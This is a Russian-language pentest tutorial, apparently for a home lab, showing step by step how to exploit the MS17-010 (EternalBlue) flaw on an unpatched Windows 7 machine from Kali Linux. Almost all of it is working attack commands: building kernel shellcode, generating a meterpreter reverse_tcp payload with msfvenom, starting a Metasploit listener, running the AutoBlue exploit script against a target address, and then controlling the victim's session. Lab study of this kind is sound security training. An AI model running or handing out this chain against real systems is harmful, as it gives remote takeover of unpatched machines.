Данная уязвимость использовалась при распространении вредоносного ПО WannaCry в мае 2017 года, а также при распространении Petya в июне 2017 года. Уязвимости были подвержены операционные системы от Windows XP до Windows Server 2016.
Нам понадобятся две виртуальных машины: первая машина Windows 7 x32, без заплатки kb4012212, вторая Kali Linux
Код эксплоита можно скачать здесь: https://github.com/3ndG4me/AutoBlue-MS17-010
Затем на Kali открываем два терминала, в первом готовим и запускаем на прослушивание порта модуль метерпретера:
cd AutoBlue-MS17-010-master/shellcode nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.189.130 LPORT=4444 cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
Во втором компилируем и готовим сам эксплоит:
msfconsole -q use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set EXITFUNC thread set LHOST 192.168.189.130 show options exploit -j jobs
Затем в первой консоли командой
python eternalblue_exploit7.py 192.168.189.133 ./shellcode/sc_x86.bin
пытаемся проэксплуатировать уязвимость.
Иногда в процессе попытки эксплуатации виртуальная машина Windows 7 падает с синим экраном, будьте к этому готовы, иногда приходится запустить вышеприведенную команду несколько раз, прежде чем произойдет удачная эксплуатация уязвимости.
В случае удачного подключения машины жертвы к машине злоумышленника, во второй консоли отобразится что-то наподобии этого:
*] Sending stage (175174 bytes) to 192.168.189.133 [*] Meterpreter session
<SESSION_NUMBER>
opened (192.168.189.130:4444 -> 192.168.189.133:49160 ) at 2022-10-01 03:38:26 -0400
После этого, в этой консоли можно ввести sessions -i <SESSION_NUMBER>, тем самым подключиться к сессии и начать управление удаленным компьютером, например командой screenshot можно сделать скриншот на компьютере жертвы. Список всех доступных команд можно получить командой help.
Статья написана с целью более глубокого погружения в тему пентеста, простые и очевидные команды пропущены.